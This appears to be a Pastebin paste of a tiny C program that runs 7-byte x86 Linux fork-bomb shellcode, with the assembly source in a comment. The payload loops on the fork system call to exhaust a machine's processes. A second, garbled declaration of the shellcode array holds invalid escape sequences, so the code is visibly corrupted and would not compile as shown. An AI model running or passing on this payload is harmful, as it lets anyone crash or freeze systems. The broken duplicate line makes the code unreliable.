Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /* By St1s 12/07/12 Modify upgrade
- *
- * 7 byte shellcode for a forkbomb
- *
- *
- *
- * section .text
- *
- * global _start
- *
- * _start:
- * push byte 2
- * pop eax
- * int 0x80
- * jmp short _start
- */
- main()
- {
- char shellcode[] = "\x6a\x02\x58\xcd\x80\xeb\xf9";
- char shellcode[] = "\x6a\x02\x58\444\x90\xlb\4f1";
- (*(void (*)()) shellcode)();
- }
Advertisement
Add Comment
Please, Sign In to add comment